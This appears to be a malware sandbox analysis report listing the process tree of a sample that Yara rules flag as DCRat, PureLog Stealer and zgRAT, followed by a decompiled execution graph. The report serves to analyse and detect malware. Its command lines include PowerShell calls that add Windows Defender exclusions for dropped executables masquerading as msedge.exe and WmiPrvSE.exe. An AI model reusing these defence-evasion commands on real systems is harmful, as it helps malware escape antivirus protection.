                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 74%, ReversingLabs
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:12:19:31
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"
                                                                                                                                                                      Imagebase:0x7ff67ed10000
                                                                                                                                                                      File size:2'759'232 bytes
                                                                                                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:12:19:31
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:12:19:31
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
                                                                                                                                                                      Imagebase:0x7ff617920000
                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:12:19:31
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"
                                                                                                                                                                      Imagebase:0x7ff67ed10000
                                                                                                                                                                      File size:2'759'232 bytes
                                                                                                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:24
                                                                                                                                                                      Start time:12:19:32
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:25
                                                                                                                                                                      Start time:12:19:32
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
                                                                                                                                                                      Imagebase:0x7ff617920000
                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:31
                                                                                                                                                                      Start time:12:19:32
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'
                                                                                                                                                                      Imagebase:0x7ff6cb6b0000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:32
                                                                                                                                                                      Start time:12:19:32
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                                                                                                                                                      Imagebase:0x7ff6cb6b0000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:12:19:32
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:34
                                                                                                                                                                      Start time:12:19:32
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:35
                                                                                                                                                                      Start time:12:19:33
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat"
                                                                                                                                                                      Imagebase:0x7ff6aade0000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:12:19:33
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:37
                                                                                                                                                                      Start time:12:19:34
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:chcp 65001
                                                                                                                                                                      Imagebase:0x7ff65a800000
                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:38
                                                                                                                                                                      Start time:12:19:34
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:ping -n 10 localhost
                                                                                                                                                                      Imagebase:0x7ff778970000
                                                                                                                                                                      File size:22'528 bytes
                                                                                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:39
                                                                                                                                                                      Start time:12:19:34
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Edge\msedge.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Edge\msedge.exe
                                                                                                                                                                      Imagebase:0xbc0000
                                                                                                                                                                      File size:1'963'008 bytes
                                                                                                                                                                      MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:40
                                                                                                                                                                      Start time:12:19:34
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Edge\msedge.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Edge\msedge.exe
                                                                                                                                                                      Imagebase:0x530000
                                                                                                                                                                      File size:1'963'008 bytes
                                                                                                                                                                      MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:41
                                                                                                                                                                      Start time:12:19:37
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                      Imagebase:0x7ff605670000
                                                                                                                                                                      File size:496'640 bytes
                                                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:42
                                                                                                                                                                      Start time:12:19:43
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\WmiPrvSE.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                                      Imagebase:0x750000
                                                                                                                                                                      File size:1'963'008 bytes
                                                                                                                                                                      MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 74%, ReversingLabs
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:43
                                                                                                                                                                      Start time:12:19:45
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xPfNd2AH1w.bat"
                                                                                                                                                                      Imagebase:0x7ff6aade0000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:45
                                                                                                                                                                      Start time:12:19:46
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:46
                                                                                                                                                                      Start time:12:19:46
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:chcp 65001
                                                                                                                                                                      Imagebase:0x7ff65a800000
                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:47
                                                                                                                                                                      Start time:12:19:46
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:ping -n 10 localhost
                                                                                                                                                                      Imagebase:0x7ff778970000
                                                                                                                                                                      File size:22'528 bytes
                                                                                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:49
                                                                                                                                                                      Start time:12:19:51
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:51
                                                                                                                                                                      Start time:12:19:54
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Edge\msedge.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                      Imagebase:0xe70000
                                                                                                                                                                      File size:1'963'008 bytes
                                                                                                                                                                      MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:52
                                                                                                                                                                      Start time:12:19:57
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
                                                                                                                                                                      Imagebase:0x7ff6aade0000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:53
                                                                                                                                                                      Start time:12:19:57
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:54
                                                                                                                                                                      Start time:12:19:57
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:chcp 65001
                                                                                                                                                                      Imagebase:0x7ff65a800000
                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:55
                                                                                                                                                                      Start time:12:19:57
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:ping -n 10 localhost
                                                                                                                                                                      Imagebase:0x7ff778970000
                                                                                                                                                                      File size:22'528 bytes
                                                                                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:56
                                                                                                                                                                      Start time:12:19:59
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\WmiPrvSE.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                                      Imagebase:0xbb0000
                                                                                                                                                                      File size:1'963'008 bytes
                                                                                                                                                                      MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:58
                                                                                                                                                                      Start time:12:20:05
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Jcydu7dUmM.bat" "
                                                                                                                                                                      Imagebase:0x7ff6aade0000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:59
                                                                                                                                                                      Start time:12:20:05
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:60
                                                                                                                                                                      Start time:12:20:05
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:chcp 65001
                                                                                                                                                                      Imagebase:0x7ff65a800000
                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:4.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:52.6%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                                                        execution_graph 19699 7ff7865e1000 GetSystemMetrics 19700 7ff78662d110 19701 7ff78662d129 19700->19701 19702 7ff78662d267 19701->19702 19703 7ff78662d131 __scrt_acquire_startup_lock 19701->19703 19859 7ff78662d588 IsProcessorFeaturePresent 19702->19859 19705 7ff78662d271 19703->19705 19711 7ff78662d14f __scrt_release_startup_lock 19703->19711 19706 7ff78662d588 9 API calls 19705->19706 19707 7ff78662d27c 19706->19707 19709 7ff78662d284 _exit 19707->19709 19708 7ff78662d174 19710 7ff78662d1fa _get_initial_narrow_environment __p___argv __p___argc 19720 7ff786623ed0 19710->19720 19711->19708 19711->19710 19714 7ff78662d1f2 _register_thread_local_exe_atexit_callback 19711->19714 19714->19710 19717 7ff78662d227 19718 7ff78662d22c _cexit 19717->19718 19719 7ff78662d231 19717->19719 19718->19719 19719->19708 19865 7ff786617730 19720->19865 19729 7ff786614220 15 API calls 19733 7ff786623f5f 19729->19733 19730 7ff786614760 35 API calls 19730->19733 19731 7ff786614220 15 API calls 19731->19733 19732 7ff786614bd0 100 API calls 19732->19733 19733->19730 19733->19731 19733->19732 19734 7ff786614220 15 API calls 19733->19734 19735 7ff786623fd9 CreateThread 19734->19735 19738 7ff78662402e 19735->19738 19736 7ff786611140 __acrt_iob_func __stdio_common_vfprintf 19736->19738 19738->19736 19738->19738 19740 7ff786627cfb _invalid_parameter_noinfo_noreturn 19738->19740 19744 7ff78661e8c0 9 API calls 19738->19744 19745 7ff78662a7e0 7 API calls 19738->19745 19746 7ff78662cdc0 free 19738->19746 19760 7ff786624b4a ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH 19738->19760 19761 7ff78662a7e0 7 API calls 19738->19761 19762 7ff78662852f 19738->19762 19768 7ff786614760 35 API calls 19738->19768 19774 7ff786614220 15 API calls 19738->19774 19779 7ff786614bd0 100 API calls 19738->19779 19794 7ff786627500 system CreateFileW 19738->19794 20520 7ff78662a7e0 19738->20520 20542 7ff78662cdc0 19738->20542 19742 7ff786627d02 19740->19742 19743 7ff78662cdc0 free 19742->19743 19748 7ff786627d0a 19743->19748 19744->19738 19749 7ff78662471f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19745->19749 19746->19738 19747 7ff7866280ac CreateToolhelp32Snapshot Process32First 19752 7ff7866280de 19747->19752 19753 7ff786628110 CloseHandle 19747->19753 19748->19747 19750 7ff786628090 MessageBoxA system 19748->19750 19751 7ff78662a590 6 API calls 19749->19751 19750->19747 19751->19738 19755 7ff7866280e0 lstrcmpiA 19752->19755 19754 7ff78662811c DeviceIoControl 19753->19754 19756 7ff786628181 MessageBoxA exit 19754->19756 19780 7ff7866281b5 19754->19780 19757 7ff7866280ff Process32Next 19755->19757 19758 7ff7866281a4 CloseHandle 19755->19758 19756->19758 19757->19753 19757->19755 19758->19754 19759 7ff78662a090 9 API calls 19759->19780 19760->19738 19775 7ff786624b6d 19760->19775 19766 7ff786624aef ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19761->19766 20651 7ff78662c970 19762->20651 19764 7ff786614760 35 API calls 19764->19775 19767 7ff78662a590 6 API calls 19766->19767 19767->19738 19768->19738 19772 7ff786614220 15 API calls 19772->19775 19773 7ff7866285c4 ?_Throw_Cpp_error@std@@YAXH 19774->19738 19775->19764 19775->19772 19778 7ff786614bd0 100 API calls 19775->19778 19782 7ff786614220 15 API calls 19775->19782 19776 7ff7866285b8 ?_Throw_Cpp_error@std@@YAXH 19776->19773 19777 7ff786628238 _Thrd_detach 19777->19776 19777->19780 19778->19775 19779->19738 19780->19759 19780->19776 19780->19777 19781 7ff786628298 19780->19781 20578 7ff78662cfb4 19780->20578 19784 7ff78662cfb4 std::_Facet_Register 4 API calls 19781->19784 19783 7ff786624b81 system CreateFileW 19782->19783 19855 7ff786624bcb 19783->19855 19785 7ff7866282a2 _beginthreadex 19784->19785 19787 7ff7866282db 19785->19787 19788 7ff7866285a5 ?_Throw_Cpp_error@std@@YAXH 19785->19788 19786 7ff786627202 system 20566 7ff78662a9e0 19786->20566 19790 7ff786628599 ?_Throw_Cpp_error@std@@YAXH 19787->19790 19791 7ff7866282e8 _Thrd_detach 19787->19791 19788->19776 19790->19788 19791->19790 19793 7ff786628306 19791->19793 19797 7ff78662a9e0 7 API calls 19793->19797 19798 7ff786627543 19794->19798 19795 7ff786627302 system 19795->19733 19796 7ff786627246 19796->19795 19801 7ff78662724e system 19796->19801 19802 7ff786628324 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19797->19802 19798->19733 19799 7ff78662a9e0 7 API calls 19798->19799 19806 7ff786627561 19798->19806 19799->19798 19801->19733 19803 7ff78662a9e0 7 API calls 19802->19803 19805 7ff786628357 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19803->19805 19807 7ff78662a9e0 7 API calls 19805->19807 19809 7ff786611140 2 API calls 19806->19809 19808 7ff78662838a 15 API calls 19807->19808 20588 7ff78661aba0 